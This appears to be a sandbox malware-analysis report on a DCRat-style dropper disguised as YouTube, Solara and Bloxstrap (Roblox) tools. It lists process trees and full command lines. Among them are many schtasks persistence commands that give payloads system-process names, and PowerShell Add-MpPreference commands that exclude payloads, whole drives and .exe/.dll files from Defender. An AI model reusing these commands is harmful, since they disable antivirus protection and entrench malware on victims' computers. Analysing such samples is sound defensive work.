PID 5072 wrote to memory of 4140 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 5072 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 5072 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 5072 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 5072 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 5072 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 5100 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 5100 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 5100 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 5100 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 5100 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 5100 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\solara.exe
PID 4140 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 4140 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 4140 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 1660 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 1660 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 1660 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 3504 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\System32\Conhost.exe
PID 3504 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\System32\Conhost.exe
PID 3504 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\System32\Conhost.exe
PID 3112 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3112 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3112 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1072 wrote to memory of 4084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 1072 wrote to memory of 4084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 3012 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 3012 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 3012 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 2424 wrote to memory of 3592 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 2424 wrote to memory of 3592 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 2424 wrote to memory of 4396 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2424 wrote to memory of 4396 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2424 wrote to memory of 4396 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4084 wrote to memory of 388 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 388 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 828 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 828 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\system32\schtasks.exe
PID 4084 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\system32\schtasks.exe
PID 4084 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 416 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 416 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 924 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 924 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe

"C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "faildsfsdff" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "faildsfsdf" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "faildsfsdff" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding D65C21151CFAD8EA15E1C659DA8D6DC6

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /f

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 5BA32F3C6927AC0EC167C8219E706692

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SolaraBootstrapper" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\Cursors\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Pictures\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default\Pictures\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Pictures\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\fr-FR\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\fr-FR\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\winNet\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\winNet\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\winNet\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\winNet\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\winNet\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 10 /tr "'C:\winNet\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Documents\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\Registry.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\cmd.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\sysmon.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Refcrt.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZgZhaJuw4k.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Cursors\smss.exe

"C:\Windows\Cursors\smss.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wXWS1pp4ya.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

